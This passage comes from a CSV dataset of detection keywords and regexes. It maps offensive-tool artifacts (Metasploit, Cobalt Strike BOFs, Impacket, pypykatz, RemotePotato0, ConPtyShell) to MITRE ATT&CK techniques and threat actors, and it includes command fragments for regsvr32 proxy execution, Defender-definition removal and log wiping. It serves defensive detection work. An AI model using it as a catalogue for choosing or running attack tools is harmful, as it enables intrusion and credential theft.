T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","50","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" "*RegReeper.exe*",".{0,1000}RegReeper\.exe.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","50","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" "*RegReeper.sln*",".{0,1000}RegReeper\.sln.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","50","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" "*RegReeper.vcxproj*",".{0,1000}RegReeper\.vcxproj.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","50","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" "*Reg-Restore-Persistence-Mole-main*",".{0,1000}Reg\-Restore\-Persistence\-Mole\-main.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","50","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" "*regsvr32.exe /s /n /u /i: * scrobj.dll*",".{0,1000}regsvr32\.exe\s\/s\s\/n\s\/u\s\/i\:\s.{0,1000}\sscrobj\.dll.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","0","N/A","10","10","276","79","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" "*regsvr32_command_delivery_server*",".{0,1000}regsvr32_command_delivery_server.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*reinstall_original_pw.py*",".{0,1000}reinstall_original_pw\.py.{0,1000}","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1068","TA0001","N/A","N/A","Exploitation tools","https://github.com/risksense/zerologon","1","1","N/A","N/A","7","600","145","2020-10-15T18:31:15Z","2020-09-14T19:19:07Z" "*rekallreader.py*",".{0,1000}rekallreader\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*relay*/utils/enum.py*",".{0,1000}relay.{0,1000}\/utils\/enum\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*RelayPackets.py*",".{0,1000}RelayPackets\.py.{0,1000}","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","1","N/A","N/A","10","4355","1646","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z" "*Release of BloodHound*",".{0,1000}Release\sof\sBloodHound.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*Release.Lime-Crypter.v0.5.1.exe.zip*",".{0,1000}Release\.Lime\-Crypter\.v0\.5\.1\.exe\.zip.{0,1000}","offensive_tool_keyword","Lime-Crypter","An obfuscation tool for .Net + Native files","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/NYAN-x-CAT/Lime-Crypter","1","1","N/A","9","5","445","192","2024-04-22T21:31:18Z","2018-07-14T13:44:58Z" "*release/mipsel_agent*",".{0,1000}release\/mipsel_agent.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "*Release-ReflectiveDLL\Implant.x64.pdb*",".{0,1000}Release\-ReflectiveDLL\\Implant\.x64\.pdb.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*rem call nthash-win64 /getntlmhash*",".{0,1000}rem\scall\snthash\-win64\s\/getntlmhash.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*rem cheap bruteforce ... very slow ... ok for a few passwords*",".{0,1000}rem\scheap\sbruteforce\s\.\.\.\svery\sslow\s\.\.\.\sok\sfor\sa\sfew\spasswords.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*REM getting browser history*",".{0,1000}REM\sgetting\sbrowser\shistory.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*REM Title: Harvester_OF_SORROW*",".{0,1000}REM\sTitle\:\sHarvester_OF_SORROW.{0,1000}","offensive_tool_keyword","Harvester_OF_SORROW","The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. Finally it sends the screenshot to an email of your choosing.","T1056.001 - T1113 - T1512 - T1566.001 - T1059.006","TA0004 - TA0009 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*REM wipe the logs*",".{0,1000}REM\swipe\sthe\slogs.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*-Rem@ov@eDef@ini@tio@ns -@Al@l*",".{0,1000}\-Rem\@ov\@eDef\@ini\@tio\@ns\s\-\@Al\@l.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*remiflavien1/recon-archy*",".{0,1000}remiflavien1\/recon\-archy.{0,1000}","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","15","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" "*-remote -destPipe * -pipeHost * -destHost *",".{0,1000}\-remote\s\-destPipe\s.{0,1000}\s\-pipeHost\s.{0,1000}\s\-destHost\s.{0,1000}","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral Movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","3","293","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" "*Remote Potato by @decoder_it and @splinter_code*",".{0,1000}Remote\sPotato\sby\s\@decoder_it\sand\s\@splinter_code.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*Remote/lastpass/lastpass.x86.*",".{0,1000}Remote\/lastpass\/lastpass\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*Remote/setuserpass/*",".{0,1000}Remote\/setuserpass\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*Remote/shspawnas*",".{0,1000}Remote\/shspawnas.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*Remote/suspendresume/*",".{0,1000}Remote\/suspendresume\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*remote_exploit.erb*",".{0,1000}remote_exploit\.erb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*remote_exploit_cmd_stager.*",".{0,1000}remote_exploit_cmd_stager\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*remote_exploit_demo_template.erb*",".{0,1000}remote_exploit_demo_template\.erb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*remote_get_tor_exits_list(*",".{0,1000}remote_get_tor_exits_list\(.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*remote_shell.py*",".{0,1000}remote_shell\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*-remote=127.0.0.1:3000*",".{0,1000}\-remote\=127\.0\.0\.1\:3000.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*RemoteDesktopPassView.zip*",".{0,1000}RemoteDesktopPassView\.zip.{0,1000}","offensive_tool_keyword","rdpv","Remote Desktop PassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.","T1110 - T1560.001 - T1555.003 - T1212","TA0006 - TA0007","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/remote_desktop_password.html","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*remote-exec *jump *",".{0,1000}remote\-exec\s.{0,1000}jump\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*RemoteHashRetrieval.ps1*",".{0,1000}RemoteHashRetrieval\.ps1.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","373","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" "*-RemoteIp * -RemotePort * -Rows * -Cols * -CommandLine *.exe*",".{0,1000}\-RemoteIp\s.{0,1000}\s\-RemotePort\s.{0,1000}\s\-Rows\s.{0,1000}\s\-Cols\s.{0,1000}\s\-CommandLine\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","10","10","912","157","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" "*remote-method-guesser/rmg*",".{0,1000}remote\-method\-guesser\/rmg.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*remote-method-guesser-master*",".{0,1000}remote\-method\-guesser\-master.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*RemoteNTDLL.cpp*",".{0,1000}RemoteNTDLL\.cpp.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","161","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*RemoteNTDLL.exe*",".{0,1000}RemoteNTDLL\.exe.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","161","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*remotepipelist *",".{0,1000}remotepipelist\s.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*RemotePipeList is x64 only*",".{0,1000}RemotePipeList\sis\sx64\sonly.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","#contentstrings","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*RemotePipeList.cna*",".{0,1000}RemotePipeList\.cna.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*RemotePipeList.exe*",".{0,1000}RemotePipeList\.exe.{0,1000}","offensive_tool_keyword","RemotePipeList","A small tool that can list the named pipes bound on a remote system.","T1047 - T1021.006","TA0008 - TA0002","N/A","N/A","Discovery","https://github.com/outflanknl/C2-Tool-Collection/tree/main/Other/RemotePipeList","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*RemotePotato0*@splinter_code & @decoder_it*",".{0,1000}RemotePotato0.{0,1000}\@splinter_code\s\&\s\@decoder_it.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*RemotePotato0.exe*",".{0,1000}RemotePotato0\.exe.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","1","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "*remotereg.cna*",".{0,1000}remotereg\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 